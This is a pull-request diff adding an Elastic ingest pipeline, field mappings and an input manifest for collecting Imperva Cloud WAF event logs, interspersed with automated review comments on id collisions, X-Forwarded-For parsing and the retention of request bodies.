ignore_empty_value: true + - set: + field: source.geo.location.lon + tag: set_source_geo_location_lon_from_event_extensions_cs8 + copy_from: imperva_cloud_waf.event.extensions.cs8 + ignore_empty_value: true + - rename: + field: cef.extensions.cs9 + tag: rename_extensions_cs9 + target_field: imperva_cloud_waf.event.extensions.cs9 + ignore_missing: true + - set: + field: rule.name + tag: set_rule_name_from_event_extensions_cs9 + copy_from: imperva_cloud_waf.event.extensions.cs9 + ignore_empty_value: true + - rename: + field: cef.extensions.cs9Label + tag: rename_extensions_cs9Label + target_field: imperva_cloud_waf.event.extensions.cs9Label + ignore_missing: true + - rename: + field: cef.extensions.Customer + tag: rename_extensions_Customer + target_field: imperva_cloud_waf.event.extensions.customer + ignore_missing: true + - rename: + field: cef.extensions.destinationProcessName + tag: rename_extensions_destinationProcessName + target_field: 
imperva_cloud_waf.event.extensions.destination_process_name + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomNumber1 + tag: rename_extensions_deviceCustomNumber1 + target_field: imperva_cloud_waf.event.extensions.device.custom_number1 + ignore_missing: true + - set: + field: http.response.status_code + tag: set_http_response_status_code_from_event_extensions_device_custom_number1 + copy_from: imperva_cloud_waf.event.extensions.device.custom_number1 + ignore_empty_value: true + - rename: + field: cef.extensions.deviceCustomString1 + tag: rename_extensions_deviceCustomString1 + target_field: imperva_cloud_waf.event.extensions.device.custom_string1 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString1Label + tag: rename_extensions_deviceCustomString1Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string1_label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomString2 + tag: convert_extensions_deviceCustomString2_to_boolean + target_field: imperva_cloud_waf.event.extensions.device.custom_string2 + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString2Label + tag: rename_extensions_deviceCustomString2Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string2_label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomString3 + tag: convert_extensions_deviceCustomString3_to_boolean + target_field: imperva_cloud_waf.event.extensions.device.custom_string3 + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in 
pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString3Label + tag: rename_extensions_deviceCustomString3Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string3_label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4 + tag: rename_extensions_deviceCustomString4 + target_field: imperva_cloud_waf.event.extensions.device.custom_string4 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4Label + tag: rename_extensions_deviceCustomString4Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string4_label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString5 + tag: rename_extensions_deviceCustomString5 + target_field: imperva_cloud_waf.event.extensions.device.custom_string5 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString5Label + tag: rename_extensions_deviceCustomString5Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string5_label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString6 + tag: rename_extensions_deviceCustomString6 + target_field: imperva_cloud_waf.event.extensions.device.custom_string6 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString6Label + tag: rename_extensions_deviceCustomString6Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string6_label + ignore_missing: true + - rename: + field: cef.extensions.deviceExternalId + tag: rename_extensions_deviceExternalId + target_field: imperva_cloud_waf.event.extensions.device.externalId + ignore_missing: true + - rename: + field: cef.extensions.deviceFacility + tag: rename_extensions_deviceFacility + target_field: imperva_cloud_waf.event.extensions.device.facility + ignore_missing: true + - date: + field: cef.extensions.endTime + tag: date_extensions_endTime + target_field: 
imperva_cloud_waf.event.extensions.end_time + formats: + - ISO8601 + if: ctx.cef?.extensions?.endTime != null && ctx.cef.extensions.endTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.filePermission + tag: rename_extensions_filePermission + target_field: imperva_cloud_waf.event.extensions.file.permission + ignore_missing: true + - rename: + field: cef.extensions.fileType + tag: rename_extensions_fileType + target_field: imperva_cloud_waf.event.extensions.file.type + ignore_missing: true + - rename: + field: cef.extensions.fileId + tag: rename_extensions_fileId + target_field: imperva_cloud_waf.event.extensions.file_id + ignore_missing: true + - rename: + field: cef.extensions.postbody + tag: rename_extensions_postbody + target_field: imperva_cloud_waf.event.extensions.postbody + ignore_missing: true + - set: + field: http.request.body.content + tag: set_http_request_body_content_from_event_extensions_postbody + copy_from: imperva_cloud_waf.event.extensions.postbody + ignore_empty_value: true + - rename: + field: cef.extensions.qstr + tag: rename_extensions_qstr + target_field: imperva_cloud_waf.event.extensions.qstr + ignore_missing: true + - uri_parts: + field: url.original + tag: uri_parts_url_original + if: ctx.url?.original != null + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - user_agent: + field: user_agent.original + tag: user_agent_original + if: ctx.user_agent?.original != null + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor 
{{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: url.query + tag: set_url_query_from_event_extensions_qstr + copy_from: imperva_cloud_waf.event.extensions.qstr + ignore_empty_value: true + - rename: + field: cef.extensions.ref + tag: rename_extensions_ref + target_field: imperva_cloud_waf.event.extensions.ref + ignore_missing: true + - rename: + field: cef.extensions.requestClientApplication + tag: rename_extensions_requestClientApplication + target_field: imperva_cloud_waf.event.extensions.request.client_application + ignore_missing: true + - rename: + field: cef.extensions.requestMethod + tag: rename_extensions_requestMethod + target_field: imperva_cloud_waf.event.extensions.request.method + ignore_missing: true + - rename: + field: cef.extensions.requestUrl + tag: rename_extensions_requestUrl + target_field: imperva_cloud_waf.event.extensions.request.url + ignore_missing: true + - convert: + field: cef.extensions.sip + tag: convert_extensions_sip_to_ip + target_field: imperva_cloud_waf.event.extensions.sip + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.sip != null && ctx.cef.extensions.sip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_event_extensions_sip + copy_from: imperva_cloud_waf.event.extensions.sip + ignore_empty_value: true + - append: + field: related.ip + tag: append_destination_ip_into_related_ip + value: '{{{destination.ip}}}' + allow_duplicates: false + if: ctx.destination?.ip != null + - rename: + field: cef.extensions.siteid + tag: rename_extensions_siteid + target_field: 
imperva_cloud_waf.event.extensions.site.id + ignore_missing: true + - rename: + field: cef.extensions.siteTag + tag: rename_extensions_siteTag + target_field: imperva_cloud_waf.event.extensions.site.tag + ignore_missing: true + - convert: + field: cef.extensions.sourceAddress + tag: convert_extensions_sourceAddress_to_ip + target_field: imperva_cloud_waf.event.extensions.source.address + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.sourceAddress != null && ctx.cef.extensions.sourceAddress != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_event_extensions_source_address_into_related_ip + value: '{{{imperva_cloud_waf.event.extensions.source.address}}}' + allow_duplicates: false + if: ctx.imperva_cloud_waf?.event?.extensions?.source?.address != null + - convert: + field: cef.extensions.sourcePort + tag: convert_extensions_sourcePort_to_long + target_field: imperva_cloud_waf.event.extensions.source.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: source.port + tag: remove_source_port + ignore_missing: true + if: ctx.imperva_cloud_waf?.event?.extensions?.source?.port != null + - set: + field: destination.port + tag: set_destination_port_from_event_extensions_source_port + copy_from: imperva_cloud_waf.event.extensions.source.port + ignore_empty_value: true + - convert: + field: cef.extensions.cpt + tag: convert_extensions_cpt_to_long + target_field: imperva_cloud_waf.event.extensions.cpt + type: long + ignore_missing: true + on_failure: 
+ - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_event_extensions_cpt + copy_from: imperva_cloud_waf.event.extensions.cpt + ignore_empty_value: true + - rename: + field: cef.extensions.sourceServiceName + tag: rename_extensions_sourceServiceName + target_field: imperva_cloud_waf.event.extensions.source.service_name + ignore_missing: true + - rename: + field: cef.extensions.sourceUserId + tag: rename_extensions_sourceUserId + target_field: imperva_cloud_waf.event.extensions.source.user_id + ignore_missing: true + - append: + field: related.user + tag: append_event_extensions_source_user_id_into_related_user + value: '{{{imperva_cloud_waf.event.extensions.source.user_id}}}' + allow_duplicates: false + if: ctx.imperva_cloud_waf?.event?.extensions?.source?.user_id != null + - date: + field: cef.extensions.startTime + tag: date_extensions_startTime + target_field: imperva_cloud_waf.event.extensions.start_time + formats: + - ISO8601 + if: ctx.cef?.extensions?.startTime != null && ctx.cef.extensions.startTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.tag + tag: rename_extensions_tag + target_field: imperva_cloud_waf.event.extensions.tag + ignore_missing: true + - rename: + field: cef.extensions.ver + tag: rename_extensions_ver + target_field: imperva_cloud_waf.event.extensions.ver + ignore_missing: true + - grok: + field: imperva_cloud_waf.event.extensions.ver + tag: grok_to_extract_tls_cipher_and_version + ignore_missing: true + patterns: + - 
^(TLSv%{GREEDYDATA:tls.version} %{GREEDYDATA:tls.cipher})$ + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: cef.extensions.xff + tag: convert_extensions_xff_to_ip + target_field: imperva_cloud_waf.event.extensions.xff + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.xff != null && ctx.cef.extensions.xff != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: network.forwarded_ip + tag: set_network_forwarded_ip_from_event_extensions_xff + copy_from: imperva_cloud_waf.event.extensions.xff + ignore_empty_value: true + - append: + field: related.ip + tag: append_network_forwarded_ip_into_related_ip + value: '{{{network.forwarded_ip}}}' + allow_duplicates: false + if: ctx.network?.forwarded_ip != null + - rename: + field: cef.name + tag: rename_name + target_field: imperva_cloud_waf.event.name + ignore_missing: true + - convert: + field: cef.severity + tag: convert_severity_to_long + target_field: imperva_cloud_waf.event.severity + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.version + tag: rename_version + target_field: imperva_cloud_waf.event.version + ignore_missing: true + - remove: + field: + - imperva_cloud_waf.event.device.event_class_id + - imperva_cloud_waf.event.device.product + - imperva_cloud_waf.event.device.vendor + - 
imperva_cloud_waf.event.device.version + - imperva_cloud_waf.event.extensions.action + - imperva_cloud_waf.event.extensions.application_protocol + - imperva_cloud_waf.event.extensions.bytes_in + - imperva_cloud_waf.event.extensions.ccode + - imperva_cloud_waf.event.extensions.cpt + - imperva_cloud_waf.event.extensions.cs9 + - imperva_cloud_waf.event.extensions.device.custom_number1 + - imperva_cloud_waf.event.extensions.end_time + - imperva_cloud_waf.event.extensions.file_id + - imperva_cloud_waf.event.extensions.postbody + - imperva_cloud_waf.event.extensions.qstr + - imperva_cloud_waf.event.extensions.request.client_application + - imperva_cloud_waf.event.extensions.request.method + - imperva_cloud_waf.event.extensions.request.url + - imperva_cloud_waf.event.extensions.sip + - imperva_cloud_waf.event.extensions.source.address + - imperva_cloud_waf.event.extensions.source.port + - imperva_cloud_waf.event.extensions.source.user_id + - imperva_cloud_waf.event.extensions.start_time + - imperva_cloud_waf.event.extensions.xff + - imperva_cloud_waf.event.severity + - imperva_cloud_waf.event.extensions.cs7 + - imperva_cloud_waf.event.extensions.cs8 + - imperva_cloud_waf.event.extensions.file.permission + - imperva_cloud_waf.event.extensions.file.type + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + - remove: + field: cef + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 
0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/base-fields.yml b/packages/imperva_cloud_waf/data_stream/event/fields/base-fields.yml new file mode 100644 index 00000000000..e0aeb47a9ff --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: imperva_cloud_waf +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: imperva_cloud_waf.event +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/beats.yml b/packages/imperva_cloud_waf/data_stream/event/fields/beats.yml new file mode 100644 index 00000000000..083dcfe307e --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/fields/beats.yml 
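Review bot: The `fingerprint` processor derives `_id` from `file.inode`, `event.start` and `event.end` with `ignore_missing: true`; neither input added in this PR appears to set `file.inode`, so the id reduces to the two timestamps and distinct requests sharing the same start/end millisecond would overwrite each other at index time, silently dropping security events. Adding a per-request identifier to the `fields` list (for example `cef.extensions.deviceExternalId`, since the processor runs before the renames, or `event.original` as a fallback) would keep ids unique. `convert_extensions_xff_to_ip` assumes a single address, but X-Forwarded-For is routinely a comma-separated chain; such a value fails `type: ip` and the whole event is tagged `pipeline_error`, so split on `,` first, and because the header is client-supplied it should be treated as untrusted context distinct from `source.address`. Finally, `set_http_request_body_content_from_event_extensions_postbody` persists full request bodies in an indexed field; a comment noting that this can retain submitted credentials and PII would help operators decide whether to drop it.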
@@ -0,0 +1,27 @@
+- name: input.type
+ type: keyword
+ description: Type of filebeat input.
+- name: log.offset
+ type: long
+ description: Log offset.
+- name: tags
+ type: keyword
+ description: User defined tags.
+- name: aws.s3
+ type: group
+ fields:
+ - name: bucket
+ type: group
+ fields:
+ - name: name
+ type: keyword
+ description: The AWS S3 bucket name.
+ - name: arn
+ type: keyword
+ description: The AWS S3 bucket ARN.
+ - name: object
+ type: group
+ fields:
+ - name: key
+ type: keyword
+ description: The AWS S3 Object key.
diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/ecs.yml b/packages/imperva_cloud_waf/data_stream/event/fields/ecs.yml
new file mode 100644
index 00000000000..23390b8a250
--- /dev/null
+++ b/packages/imperva_cloud_waf/data_stream/event/fields/ecs.yml
@@ -0,0 +1,16 @@
+- name: destination
+ type: group
+ fields:
+ - name: process
+ type: group
+ fields:
+ - name: name
+ type: keyword
+- name: source
+ type: group
+ fields:
+ - name: service
+ type: group
+ fields:
+ - name: name
+ type: keyword
diff --git a/packages/imperva_cloud_waf/data_stream/event/fields/fields.yml b/packages/imperva_cloud_waf/data_stream/event/fields/fields.yml
new file mode 100644
index 00000000000..bd7fef416b0
--- /dev/null
+++ b/packages/imperva_cloud_waf/data_stream/event/fields/fields.yml
@@ -0,0 +1,212 @@ +- name: imperva_cloud_waf + type: group + fields: + - name: event + type: group + fields: + - name: device + type: group + fields: + - name: event_class_id + type: keyword + description: Signature Id. + - name: product + type: keyword + description: The product or service that is generating the logs. + - name: vendor + type: keyword + description: The vendor that is generating the logs. + - name: version + type: keyword + description: An integer that identifies the version of the log format. + - name: extensions + type: group + fields: + - name: action + type: keyword + description: The method in which Imperva processed the request. + - name: additional + type: group + fields: + - name: req_headers + type: object + object_type: keyword + description: Request headers in JSON format, with each field represented as a name-value pair. + - name: res_headers + type: object + object_type: keyword + description: Response headers in JSON format, with each field represented as a name-value pair. + - name: application_protocol + type: keyword + description: The request protocol. + - name: bytes_in + type: long + description: The content length. + - name: ccode + type: keyword + description: The country code of the site visitor. + - name: cicode + type: keyword + description: The city code of the site visitor. + - name: cpt + type: long + description: The client port used to communicate the request. + - name: cs10 + type: object + object_type: keyword + description: JSON describing all actions that were applied to a specific request. + - name: cs10Label + type: keyword + - name: cs11 + type: object + object_type: keyword + description: Additional information on the violation that triggered the rule, in JSON format. + - name: cs11Label + type: keyword + - name: cs7 + type: double + description: The latitude of the event. + - name: cs7Label + type: keyword + - name: cs8 + type: double + description: The longitude of the event. 
+ - name: cs8Label + type: keyword + - name: cs9 + type: keyword + description: The threat rule name that this request triggered. + - name: cs9Label + type: keyword + - name: customer + type: keyword + description: The account name of the site owner. + - name: destination_process_name + type: keyword + description: The browser type. + - name: device + type: group + fields: + - name: custom_number1 + type: long + description: The HTTP response code returned to the client. + - name: custom_string1 + type: keyword + description: Whether or not the client application supports Captcha. + - name: custom_string1_label + type: keyword + - name: custom_string2 + type: boolean + description: Whether or not the client application supports JavaScript. + - name: custom_string2_label + type: keyword + - name: custom_string3 + type: boolean + description: Whether or not the client application supports cookies. + - name: custom_string3_label + type: keyword + - name: custom_string4 + type: keyword + description: The ID of the visitor. + - name: custom_string4_label + type: keyword + - name: custom_string5 + type: keyword + description: For internal use. + - name: custom_string5_label + type: keyword + - name: custom_string6 + type: keyword + description: The client application software. + - name: custom_string6_label + type: keyword + - name: externalId + type: keyword + description: A unique identifier of the request that can be used to correlate with reports and data from the Imperva Cloud Security Console. + - name: facility + type: keyword + description: The Imperva PoP that handled the request. + - name: end_time + type: date + description: The end time of the response to the request, in UTC. In UNIX epoch time format. + - name: file + type: group + fields: + - name: permission + type: keyword + description: Imperva attack id. + - name: type + type: keyword + description: The type of attack. + - name: file_id + type: keyword + description: The unique identification. 
+ - name: postbody + type: keyword + description: The post body data of the request. + - name: qstr + type: keyword + description: The query string of the request. + - name: ref + type: keyword + description: The URL of the previous page that the client visited. + - name: request + type: group + fields: + - name: client_application + type: keyword + description: The UserAgent header value. + - name: method + type: keyword + description: The request method. + - name: url + type: keyword + description: The URL of the request. + - name: sip + type: ip + description: The IP address of the server. + - name: site + type: group + fields: + - name: id + type: keyword + description: The numeric identifier of the site. + - name: tag + type: keyword + description: Site level reference ID. + - name: source + type: group + fields: + - name: address + type: ip + description: The client IP that made the request. + - name: port + type: long + description: The port of the server. + - name: service_name + type: keyword + description: The name of the site. + - name: user_id + type: keyword + description: The numeric identifier of the account of the site owner. + - name: start_time + type: date + description: The time in which this visit started, in UTC. In UNIX epoch time format. + - name: tag + type: keyword + description: Account level reference ID. + - name: ver + type: keyword + description: The TLS version and encryption algorithms used in the request. + - name: xff + type: ip + description: The X-Forwarded-For request header. + - name: name + type: keyword + description: The rule type that was triggered. + - name: severity + type: long + description: Imperva internal rule ID number. + - name: version + type: keyword + description: An integer that identifies the version of the log format. diff --git a/packages/imperva_cloud_waf/data_stream/event/manifest.yml b/packages/imperva_cloud_waf/data_stream/event/manifest.yml new file mode 100644 index 00000000000..801b8bb8323 
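Review bot: `imperva_cloud_waf.event.extensions.xff` is mapped as `type: ip`, but X-Forwarded-For is a client-supplied header; if Imperva forwards the raw value, a comma-separated hop list or a non-IP string will fail the `ip` mapping at index time and the whole document is rejected rather than routed to the pipeline's `on_failure` handler (the visible part of the pipeline shows no validation step before the copy to `network.forwarded_ip` seen in the sample event, though the pipeline head is outside this chunk). Mapping the custom field as `type: keyword` and guarding the ECS copy in the pipeline would keep hostile header values from dropping events. Separately, `postbody`, `qstr` and `additional.req_headers` index request content verbatim, which in a WAF feed routinely includes credentials, session cookies and PII; a warning in their descriptions, e.g. `description: The post body data of the request. May contain credentials or personal data; drop or mask it with a processor if it must not be retained.`, would let operators scope access and retention. Also, `extensions.source.port` is described as `The port of the server` while `cpt` is described as the client port; one of the two descriptions looks wrong.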
--- /dev/null
+++ b/packages/imperva_cloud_waf/data_stream/event/manifest.yml
@@ -0,0 +1,340 @@ +title: Collect Imperva Cloud WAF Events +type: logs +streams: + - input: cel + title: Event logs + description: Collect Event logs from Imperva Cloud WAF. + template_path: cel.yml.hbs + enabled: false + vars: + - name: api_id + type: password + title: API ID + description: API ID for the Imperva Cloud WAF. + multi: false + required: true + show_user: true + secret: true + - name: api_key + type: password + title: API Key + description: API Key for the Imperva Cloud WAF. + multi: false + required: true + show_user: true + secret: true + - name: url + type: text + title: URL + description: Base URL of the Imperva Cloud WAF API. + required: true + - name: interval + type: text + title: Interval + description: Duration between requests to the Events API. Supported units for this parameter are h/m/s. + default: 1m + multi: false + required: true + show_user: true + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 30s + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_request_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - imperva_cloud_waf-event + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. 
+ type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve imperva_cloud_waf.event fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. 
+ multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- + - input: aws-s3 + title: Imperva Cloud WAF Events + description: Collect Imperva Cloud WAF Events via AWS S3 input. + template_path: aws-s3.yml.hbs + enabled: false + vars: + - name: collect_s3_logs + required: true + show_user: true + title: Collect logs via S3 Bucket + description: To Collect logs via S3 bucket enable the toggle switch. By default, it will collect logs via SQS Queue. + type: bool + multi: false + default: false + - name: access_key_id + type: password + title: Access Key ID + multi: false + required: false + show_user: true + description: First part of access key. 
+ secret: true + - name: secret_access_key + type: password + title: Secret Access Key + multi: false + required: false + show_user: true + description: Second part of access key. + secret: true + - name: session_token + type: text + title: Session Token + multi: false + required: false + show_user: true + description: Required when using temporary security credentials. + secret: false + - name: bucket_arn + type: text + title: "[S3] Bucket ARN" + multi: false + required: false + show_user: true + description: ARN of the AWS S3 bucket that will be polled for list operation. It is a required parameter for collecting logs via the AWS S3 Bucket. + - name: bucket_list_prefix + type: text + title: "[S3] Bucket Prefix" + multi: false + required: false + show_user: true + description: Prefix to apply for the list request to the S3 bucket. + - name: interval + type: text + title: "[S3] Interval" + multi: false + required: false + show_user: true + default: 6m + description: Time interval for polling listing of the S3 bucket. It should be greater than 5m. Supported units are h/m/s. + - name: number_of_workers + type: integer + title: "[S3] Number of Workers" + multi: false + required: false + show_user: true + default: 5 + description: Number of workers that will process the S3 objects listed. It is a required parameter for collecting logs via the AWS S3 Bucket. + - name: queue_url + type: text + title: "[SQS] Queue URL" + multi: false + required: false + show_user: true + description: URL of the AWS SQS queue that messages will be received from. It is a required parameter for collecting logs via the AWS SQS. + - name: visibility_timeout + type: text + title: "[SQS] Visibility Timeout" + multi: false + required: false + show_user: true + default: 300s + description: The duration that the received messages are hidden from subsequent retrieve requests after being retrieved by a ReceiveMessage request. The maximum is 12 hours. Supported units for this parameter are h/m/s. 
+ - name: api_timeout + type: text + title: "[SQS] API Timeout" + multi: false + required: false + show_user: true + default: 120s + description: The maximum duration of AWS API can take. The maximum is half of the visibility timeout value. Supported units for this parameter are h/m/s. + - name: max_number_of_messages + type: integer + title: "[SQS] Maximum Concurrent SQS Messages" + required: false + show_user: true + default: 5 + description: The maximum number of SQS messages that can be inflight at any time. + - name: file_selectors + type: yaml + title: "[SQS] File Selectors" + multi: false + required: false + show_user: false + description: If the SQS queue will have events that correspond to files that this integration shouldn't process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + - name: region + type: text + title: "[SQS] Region" + multi: false + required: false + show_user: true + description: The name of the AWS region of the end point. If this option is given it takes precedence over the region name obtained from the queue_url value. + - name: fips_enabled + type: bool + title: Enable S3 FIPS + default: false + multi: false + required: false + show_user: false + description: Enabling this option changes the service name from `s3` to `s3-fips` for connecting to the correct service endpoint. 
